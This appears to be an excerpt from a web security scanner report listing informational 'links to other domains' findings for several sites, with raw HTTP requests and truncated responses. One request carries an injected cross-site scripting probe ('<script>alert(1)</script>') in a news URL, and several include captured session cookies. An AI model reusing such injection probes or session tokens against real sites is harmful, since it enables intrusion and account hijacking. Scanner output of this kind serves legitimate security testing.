<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b06/0/0/%2a/r;240534671;0-0;0;63426418;4307-300/250;41934104/41951891/1;;~sscs=%3fhttp://switchtopeoplesunited.com"><img src="http://s0.2mdn.net/viewad/2810457/PNB_Delighting_CT_300x250_r2.jpg" border=0 alt="Click here to find out more!"></a>
...[SNIP]...
24.3. http://gigablast.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://gigablast.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /?c=dmoz3 HTTP/1.1
Host: gigablast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Length: 6411
Content-Type: text/html; charset=
Connection: Close
Server: Gigablast/1.0
Expires: Thu, 12 May 2011 15:16:36 GMT
Date: Thu, 12 May 2011 15:16:11 GMT
Last-Modified: Thu, 12 May 2011 15:16:11 GMT

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"><meta name="description" content="A powerful, new search engine that does real-time indexing.">
<meta name="key
...[SNIP]...
<font face="sans-serif, Arial, Helvetica" size="2">
<a href="http://dmoz.org/cgi-bin/add.cgi?where=$cat">Submit a Site</a> -
<a href="http://dmoz.org/about.html"><b>
...[SNIP]...
</a> -
<a href="http://dmoz.org/cgi-bin/apply.cgi?where=$cat">Become an Editor</a>
...[SNIP]...
24.4. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-nytimes_display_html&format=728x90_pas_abgc&output=html&h=90&w=728&lmt=1305230017&channel=ROS_leaderboard&ad_type=image%2Cflash&alternate_ad_url=http%3A%2F%2Fwww.nytimes.com%2Fads%2Fremnant%2Fnetworkredirect-leaderboard.html&oe=utf8&flash=0&url=http%3A%2F%2Fwww.nytimes.com%2F2010%2F08%2F22%2Fsports%2Fcycling%2F22armstrong.html%3F59261%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E223d24b026d%3D1&adsafe=high&targeting=site&dt=1305230025334&bpp=2&shv=r20110427&jsv=r20110506&correlator=1305230043462&frm=0&adk=966927225&ga_vid=2015666648.1305230048&ga_sid=1305230048&ga_hid=121312136&ga_fc=0&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=5&u_nmime=39&biw=1153&bih=938&ref=http%3A%2F%2Fburp%2Fshow%2F7&fu=0&ifi=1&dtd=M&xpc=2NMBBNFUIU&p=http%3A//www.nytimes.com HTTP/1.1
Host: googleads.g.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.nytimes.com/2010/08/22/sports/cycling/22armstrong.html?59261%22%3E%3Cscript%3Ealert(1)%3C/script%3E223d24b026d=1
Cookie: id=c60bd0733000097|2258832/785797/15105|t=1297260501|et=730|cs=g_qf15ye

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Thu, 12 May 2011 19:54:10 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 4706

<html><head><style><!--
a:link { color: #ffffff }a:visited { color: #ffffff }a:hover { color: #ffffff }a:active { color: #ffffff } --></style><script><!--
(function(){window.ss=function(a){window.sta
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/i.png' alt="(i)" border=0 height=12px width=12px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.nytimes.com/2010/08/22/sports/cycling/22armstrong.html%26hl%3Den%26client%3Dca-nytimes_display_html%26adU%3Dwww.gardasil.com%26adT%3DImageAd%26gl%3DUS%26hideleadgen%3D1&amp;usg=AFQjCNElN7ro-xQq0j1dJIGPPb1BLePqQA" target=_blank><img alt="Ads by Google" border=0 height=16px src=http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png width=78px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...
24.5. http://layserfreiwald.com/attorneys.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://layserfreiwald.com
Path:   /attorneys.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /attorneys.html?mode=view&AID=2 HTTP/1.1
Host: layserfreiwald.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://layserfreiwald.com/
Cookie: CFID=8b46ceb8%2Df5f2%2D4810%2D8dca%2Db8cba45aa5c4; CFTOKEN=0; vt=u; __utma=146588073.159810427.1305223741.1305223741.1305223741.1; __utmb=146588073.5.10.1305223741; __utmc=146588073; __utmz=146588073.1305223741.1.1.utmcsr=elawmarketing.com|utmccn=(referral)|utmcmd=referral|utmcct=/portfolio/websites/layser-freiwald

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 18:40:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Railo-Version: 3.2.2.000
Content-Type: text/html; charset=UTF-8
Content-Length: 15289


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" co
...[SNIP]...
</script>

<script type="text/javascript" src="http://labs.natpal.com/onesite/attrdetect?clientId=44899"></script>
...[SNIP]...
<div class="profile"><a href="http://www.superlawyers.com/redir?r=http://www.superlawyers.com/pennsylvania/lawyer/Aaron-J-Freiwald/16e5fe83-1c36-49d8-8cae-c2d9892a4050.html&amp;c=120_badge&amp;i=16e5fe83-1c36-49d8-8cae-c2d9892a4050" title="Super Lawyers Profile for Aaron J. Freiwald">Aaron J. Freiwald</a>
...[SNIP]...
<div><a href="http://www.superlawyers.com/redir?r=http://www.superlawyers.com/pennsylvania/lawyer/Aaron-J-Freiwald/16e5fe83-1c36-49d8-8cae-c2d9892a4050.html&amp;c=120_badge&amp;i=16e5fe83-1c36-49d8-8cae-c2d9892a4050"><img src="http://www.superlawyers.com/images/badges/badge-com-logo-120.jpg" border="0" alt="Super Lawyers" /></a></div>
   <div class="visit"><a href="http://www.superlawyers.com/redir?r=http://www.superlawyers.com&amp;c=120_badge&amp;i=home_page">visit superlawyers.com</a>
...[SNIP]...
<span class="fright"><a href="http://www.elawmarketing.com/">Law firm website by eLawMarketing</a>
...[SNIP]...
</div>


<script type="text/javascript" src="http://labs.natpal.com/trac/js/ena.js?trkDomain=layserfreiwald.com"></script>
<script type="text/javascript" src="http://labs.natpal.com/trk/leadscript"></script>
...[SNIP]...
24.6. http://layserfreiwald.com/attorneys.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://layserfreiwald.com
Path:   /attorneys.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /attorneys.html?mode=view&AID=8 HTTP/1.1
Host: layserfreiwald.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://layserfreiwald.com/
Cookie: CFID=8b46ceb8%2Df5f2%2D4810%2D8dca%2Db8cba45aa5c4; CFTOKEN=0; vt=u; __utma=146588073.159810427.1305223741.1305223741.1305223741.1; __utmb=146588073.1.10.1305223741; __utmc=146588073; __utmz=146588073.1305223741.1.1.utmcsr=elawmarketing.com|utmccn=(referral)|utmcmd=referral|utmcct=/portfolio/websites/layser-freiwald

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 18:13:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Railo-Version: 3.2.2.000
Content-Type: text/html; charset=UTF-8
Content-Length: 11012


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" co
...[SNIP]...
</script>

<script type="text/javascript" src="http://labs.natpal.com/onesite/attrdetect?clientId=44899"></script>
...[SNIP]...
<div class="profile"><a href="http://www.superlawyers.com/redir?r=http://www.superlawyers.com/pennsylvania/lawyer/Glenn-A-Ellis/8480c83d-644a-4fd5-9e3b-15644c36fe5e.html&amp;c=150_badge&amp;i=8480c83d-644a-4fd5-9e3b-15644c36fe5e" title="Super Lawyers Profile for Glenn A. Ellis">Glenn A. Ellis</a>
...[SNIP]...
<div><a href="http://www.superlawyers.com/redir?r=http://www.superlawyers.com/pennsylvania/lawyer/Glenn-A-Ellis/8480c83d-644a-4fd5-9e3b-15644c36fe5e.html&amp;c=150_badge&amp;i=8480c83d-644a-4fd5-9e3b-15644c36fe5e"><img src="http://www.superlawyers.com/images/badges/badge-com-logo-150.jpg" border="0" alt="Super Lawyers" /></a></div>
   <div class="visit"><a href="http://www.superlawyers.com/redir?r=http://www.superlawyers.com&amp;c=150_badge&amp;i=home_page">visit superlawyers.com</a>
...[SNIP]...
<span class="fright"><a href="http://www.elawmarketing.com/">Law firm website by eLawMarketing</a>
...[SNIP]...
</div>


<script type="text/javascript" src="http://labs.natpal.com/trac/js/ena.js?trkDomain=layserfreiwald.com"></script>
<script type="text/javascript" src="http://labs.natpal.com/trk/leadscript"></script>
...[SNIP]...
24.7. http://www.bing.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /search?q=gigablast.com&src=ie9tr HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Host: www.bing.com
Proxy-Connection: Keep-Alive
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHD=MS=1766474&SM=1&D=1593447&AF=NOFORM; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; _UR=OMW=0; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c91dbe765356b43c2af9db971344153a4

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
X-UA-Compatible: IE=7
Vary: Accept-Encoding
Date: Thu, 12 May 2011 15:13:50 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: _SS=SID=357505634DE040F7AAB78C84F4F41453; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Sat, 11-May-2013 15:13:50 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c0a2bc88e712d46c3bff774df04608da4; expires=Sat, 11-May-2013 15:13:50 GMT; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1767793&SM=1&D=1593447&AF=NOFORM; expires=Sat, 11-May-2013 15:13:50 GMT; domain=.bing.com; path=/
Content-Length: 39226

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web="h
...[SNIP]...
<li><a href="http://www.msn.com/" onmousedown="return si_T('&amp;ID=FD,39.1')">MSN</a></li><li><a href="http://mail.live.com/" onmousedown="return si_T('&amp;ID=FD,41.1')">Hotmail</a>
...[SNIP]...
<h3><a href="http://gigablast.com/" onmousedown="return si_T('&amp;ID=SERP,5074.1')"><strong>
...[SNIP]...
<li><a href="http://www.gigablast.com/?c=dmoz3" onmousedown="return si_T('&amp;ID=SERP,5047.1')">Directory</a></li><li><a href="http://www.gigablast.com/about.html" onmousedown="return si_T('&amp;ID=SERP,5049.1')">About</a></li><li><a href="http://www.gigablast.com/products.html" onmousedown="return si_T('&amp;ID=SERP,5051.1')">Services</a></li><li><a href="http://www.gigablast.com/help.html" onmousedown="return si_T('&amp;ID=SERP,5053.1')">Help</a>
...[SNIP]...
<li><a href="http://www.gigablast.com/contact.html" onmousedown="return si_T('&amp;ID=SERP,5055.1')">Contact</a></li><li><a href="http://www.gigablast.com/careers.html" onmousedown="return si_T('&amp;ID=SERP,5057.1')">Careers</a></li><li><a href="http://www.gigablast.com/press.html" onmousedown="return si_T('&amp;ID=SERP,5059.1')">Press</a></li><li><a href="http://www.gigablast.com/clients.html" onmousedown="return si_T('&amp;ID=SERP,5061.1')">Clients</a>
...[SNIP]...
<h3><a href="http://gigablast.com/addurl" onmousedown="return si_T('&amp;ID=SERP,5098.1')"><strong>
...[SNIP]...
<h3><a href="http://websearch.about.com/od/enginesanddirectories/a/gigablast.htm" onmousedown="return si_T('&amp;ID=SERP,5112.1')"><strong>
...[SNIP]...
<h3><a href="http://www.enetsc.com/Gigablast.htm" onmousedown="return si_T('&amp;ID=SERP,5127.1')"><strong>
...[SNIP]...
<h3><a href="http://dir.gigablast.com/Shopping/Sports/" onmousedown="return si_T('&amp;ID=SERP,5150.1')"><strong>
...[SNIP]...
<h3><a href="http://www.wordiq.com/definition/Gigablast" onmousedown="return si_T('&amp;ID=SERP,5164.1')"><strong>
...[SNIP]...
<h3><a href="http://www.sc.edu/beaufort/library/pages/bones/lesson14.shtml" onmousedown="return si_T('&amp;ID=SERP,5189.1')">bare bones lesson 14: <strong>
...[SNIP]...
<h3><a href="http://www.searchenginejournal.com/gigablast-better-than-google-or-askcom-according-to-study/6551/" onmousedown="return si_T('&amp;ID=SERP,5203.1')"><strong>
...[SNIP]...
<h3><a href="http://www.programmableweb.com/api/gigablast" onmousedown="return si_T('&amp;ID=SERP,5227.1')"><strong>
...[SNIP]...
<h3><a href="http://www.searchengineshowdown.com/features/gigablast/review.html" onmousedown="return si_T('&amp;ID=SERP,5241.1')"><strong>
...[SNIP]...
</span><a href="http://go.microsoft.com/?linkid=9771044" class="sn_link" tabindex="0" onmousedown="return si_T('&amp;ID=SERP,5322.1')"><span>
...[SNIP]...
<li><a href="http://go.microsoft.com/fwlink/?LinkId=74170" onmousedown="return si_T('&amp;ID=FD,92.1')">Privacy</a> | </li><li><a href="http://g.msn.com/0TO_/enus" onmousedown="return si_T('&amp;ID=FD,94.1')">Legal</a> | </li><li><a href="http://advertising.microsoft.com/advertise-on-bing" onmousedown="return si_T('&amp;ID=FD,96.1')">Advertise</a>
...[SNIP]...
<li><a href="http://g.msn.com/AIPRIV/en-us" target="_blank" onmousedown="return si_T('&amp;ID=FD,98.1')">About our ads</a>
...[SNIP]...
<li><a href="http://onlinehelp.microsoft.com/en-US/bing/ff808535.aspx" id="sb_help" target="_blank" onmousedown="return si_T('&amp;ID=FD,100.1')">Help</a> | </li><li><a href="https://feedback.live.com/default.aspx?locale=en-US&amp;productkey=wlsearchweb&amp;P1=dsatweb&amp;P2=gigablast.com&amp;P3=socialanswercontrol&amp;P4=NOFORM&amp;P5=F741A5D3C8544F77A0B57D8439E7E06E&amp;P6=Washington, District Of Columbia&amp;P9=38.906898498%2f-77.028396606&amp;P10=0&amp;P11=&amp;searchtype=Web+Search&amp;optl1=1&amp;backurl=http%3a%2f%2fwww.bing.com%2fsearch%3fq%3dgigablast.com%26src%3die9tr%26FORM%3dFEEDTU" id="sb_feedback" onclick="si_fb.openCard(this);return false" onfocus="si_fb.loadCard()" onmousedown="return si_T('&amp;ID=FD,102.1')">Tell us what you think</a>
...[SNIP]...
24.8. http://www.gartner.com/0_admin/PasswordRequest.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gartner.com
Path:   /0_admin/PasswordRequest.jsp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /0_admin/PasswordRequest.jsp?startPage=https://my.gartner.com/portal/server.pt HTTP/1.1
Host: www.gartner.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: MKTSESSIONID=7R35NMQNKWLjx0D2zJ5tccGYZyfhxZz1KqlGnMGQ1Nrj7tKGNHLd!552912517; TS83f541=8c2f07080d93fc7c29de368621e79dbfb051461b2195a5984dcc40ad; WebLogicSession=NGzFNMQQLfg4nHNB1rSVw7h8jMcC2MtCGxQhN8JLf9czQh2m7HTy!-483811359; WT_FPC=id=173.193.214.243-3544042224.30150881:lv=1305231772135:ss=1305231539240; UnicaID=KYiHjYpm8oa-W8sigYv; __utma=256913437.1618180158.1305231541.1305231541.1305231541.1; __utmb=256913437.4.10.1305231541; __utmc=256913437; __utmz=256913437.1305231541.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); LoginWLSessionID=dj22NMQfh16FmhxVgWyctlxb73Tc6GtpjZsgcTX6L9DvmxX5cNHZ!-1907662523

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 12 May 2011 20:22:58 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=ISO8859_1
X-PvInfo: [S10203.C10821.A158620.RA0.G26D16.U120AE182].[OT/html.OG/pages]
Vary: Accept-Encoding
Content-Length: 22134

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>
<head>
<title>Request Password</title>


<script src="/js/utility.js" type="text/javascript"></script>
<scr
...[SNIP]...
<noscript>
<img src="http://pt200238.unica.com/ntpagetag.gif?js=0&site=www" height="1" width="1" border="0" hspace="0" vspace="0" alt="">
</noscript>
...[SNIP]...
24.9. http://www.gartner.com/technology/cio-priorities/ipad-business.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gartner.com
Path:   /technology/cio-priorities/ipad-business.jsp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /technology/cio-priorities/ipad-business.jsp?prm=TW_CHCIOP HTTP/1.1
Host: www.gartner.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.gartner.com/technology/home.jsp
Cookie: MKTSESSIONID=7R35NMQNKWLjx0D2zJ5tccGYZyfhxZz1KqlGnMGQ1Nrj7tKGNHLd!552912517; TS83f541=8c2f07080d93fc7c29de368621e79dbfb051461b2195a5984dcc40ad; WebLogicSession=NGzFNMQQLfg4nHNB1rSVw7h8jMcC2MtCGxQhN8JLf9czQh2m7HTy!-483811359; WT_FPC=id=173.193.214.243-3544042224.30150881:lv=1305231564450:ss=1305231539240; UnicaID=KYiHjYpm8oa-W8sigYv; __utma=256913437.1618180158.1305231541.1305231541.1305231541.1; __utmb=256913437.1.10.1305231541; __utmc=256913437; __utmz=256913437.1305231541.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Connection: close
X-Powered-By: Servlet/2.4 JSP/2.0
Content-Type: text/html; charset=ISO-8859-1
Date: Thu, 12 May 2011 20:19:30 GMT
ETag: "pv532dde66121797e6486e070ed61b7cf6"
X-PvInfo: [S10202.C10821.A158661.RA0.G26D17.UDB73D7C6].[OT/html.OG/pages]
Vary: Accept-Encoding
Content-Length: 26186

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<h
...[SNIP]...
</a>
       
       <a href="http://twitter.com/share" class="twitter" data-count="horizontal">Twitter</a>
       <script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>

       <script src="http://www.stumbleupon.com/hostedbadge.php?s=1"></script>
       
       <a href="http://reddit.com/submit" onclick="window.location = 'http://reddit.com/submit?url=' + encodeURIComponent(window.location); return false" class="reddit">Reddit</a>
...[SNIP]...
</span>
    <a href="http://www.facebook.com/Gartner" title="Facebook">
    <img src="http://imagesrv.gartner.com/images/icons/facebook_icon.gif;pvb8a0c411659e5ce9" border="0" alt="Facebook" />
...[SNIP]...
</a>
       <a href="http://www.linkedin.com/companies/gartner?trk=copro_t" title="LinkedIn">
       <img src="http://imagesrv.gartner.com/images/icons/in_icon.gif;pv1cde70a9e9142a83" border="0" alt="LinkedIn" />
...[SNIP]...
</a>
       <a href="http://www.twitter.com/Gartner_inc" title="Twitter">
       <img src="http://imagesrv.gartner.com/images/icons/twitter_icon.gif;pv9f284a523d5a3806" border="0" alt="Twitter" />
...[SNIP]...
<li><a href="http://www.gartnerinsight.com/garstr1?WT.mc_id=PCP_Rep" onClick="rawPopUp('http://www.gartnerinsight.com/garstr1?WT.mc_id=PCP_Rep'); return false;" target="_new">Contact a Representative</a>
...[SNIP]...
<noscript>
<img src="http://pt200238.unica.com/ntpagetag.gif?js=0&site=www" height="1" width="1" border="0" hspace="0" vspace="0" alt="">
</noscript>
...[SNIP]...
24.10. http://www.gigablast.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gigablast.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /?c=dmoz3 HTTP/1.1
Host: www.gigablast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Length: 6412
Content-Type: text/html; charset=
Connection: Close
Server: Gigablast/1.0
Expires: Thu, 12 May 2011 15:16:27 GMT
Date: Thu, 12 May 2011 15:16:02 GMT
Last-Modified: Thu, 12 May 2011 15:16:02 GMT

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"><meta name="description" content="A powerful, new search engine that does real-time indexing.">
<meta name="key
...[SNIP]...
<font face="sans-serif, Arial, Helvetica" size="2">
<a href="http://dmoz.org/cgi-bin/add.cgi?where=$cat">Submit a Site</a> -
<a href="http://dmoz.org/about.html"><b>
...[SNIP]...
</a> -
<a href="http://dmoz.org/cgi-bin/apply.cgi?where=$cat">Become an Editor</a>
...[SNIP]...
24.11. http://www.google.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /search?q=Poyner+Spruill&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a HTTP/1.1
Host: www.google.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: PREF=ID=a84248b084119e14:U=0e01645f8124d18b:FF=0:TM=1297097718:LM=1297260472:S=nEXcDanFJNlg7e6-; NID=46=MZ67J2sMk2-iutK_j-M5kw_OU3QwEqLvmD3FPQ_AsjnltT7UerAb1HjiSijLELzg8YEwu50i5Tjttnu8jq1EP7Tjw2-1bm8QN0ooAhBiMftqXzqms7RFfZAGQXTL5FgE

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:04:49 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 71113

<!doctype html> <head> <title>Poyner Spruill - Google Search</title> <script>window.google={kEI:"IQXMTdeoEIHB0AHMxanhBg",kEXPI:"17259,23756,24692,24878,24879,27400,28164,28505,29229,29685,29795
...[SNIP]...
</div><a id=gb_36 href="http://www.youtube.com/results?q=Poyner+Spruill&oe=utf-8&rls=org.mozilla:en-US:official&client=firefox-a&um=1&ie=UTF-8&sa=N&hl=en&tab=w1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<h3 class="r"><a href="http://www.poynerspruill.com/" class=l onmousedown="return clk(this.href,'','','','1','','0CBkQFjAA')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:arvbLL5hUF0J:www.poynerspruill.com/+Poyner+Spruill&amp;cd=1&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','1','','0CB4QIDAA')">Cached</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.poynerspruill.com/people/" onmousedown="return clk(this.href,'','','','1','','0CCAQqwMoADAA')">People</a></div><div class=sld><a class=sla href="http://www.poynerspruill.com/offices/Pages/Raleigh.aspx" onmousedown="return clk(this.href,'','','','1','','0CCEQqwMoATAA')">Raleigh</a></div><div class=sld><a class=sla href="http://www.poynerspruill.com/offices/" onmousedown="return clk(this.href,'','','','1','','0CCIQqwMoAjAA')">Offices</a></div><div class=sld><a class=sla href="http://www.poynerspruill.com/offices/Pages/Charlotte.aspx" onmousedown="return clk(this.href,'','','','1','','0CCMQqwMoAzAA')">Charlotte</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.poynerspruill.com/offices/Pages/RockyMount.aspx" onmousedown="return clk(this.href,'','','','1','','0CCQQqwMoBDAA')">Rocky Mount</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.poynerspruill.com/careers/Pages/WhoWeAre.aspx" onmousedown="return clk(this.href,'','','','1','','0CCUQqwMoBTAA')">Careers</a></div><div class=sld><a class=sla href="http://www.poynerspruill.com/publications/" onmousedown="return clk(this.href,'','','','1','','0CCYQqwMoBjAA')">Publications</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.poynerspruill.com/about/" onmousedown="return clk(this.href,'','','','1','','0CCcQqwMoBzAA')">See more about us</a>
...[SNIP]...
<h3 class="r"><a href="http://www.poynerspruill.com/offices/Pages/Raleigh.aspx" class=l onmousedown="return clk(this.href,'','','','2','','0CCoQFjAB')">Raleigh - <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:nmAJNyl84F0J:www.poynerspruill.com/offices/Pages/Raleigh.aspx+Poyner+Spruill&amp;cd=2&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','2','','0CC8QIDAB')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.poynerspruill.com/people/" class=l onmousedown="return clk(this.href,'','','','3','','0CDEQFjAC')">People - <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:THKSxuYHJ9UJ:www.poynerspruill.com/people/+Poyner+Spruill&amp;cd=3&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','3','','0CDYQIDAC')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.poynerspruill.com/offices/Pages/Charlotte.aspx" class=l onmousedown="return clk(this.href,'','','','4','','0CDgQFjAD')">Charlotte - <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:5nqtvFM6b38J:www.poynerspruill.com/offices/Pages/Charlotte.aspx+Poyner+Spruill&amp;cd=4&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','4','','0CD0QIDAD')">Cached</a>
...[SNIP]...
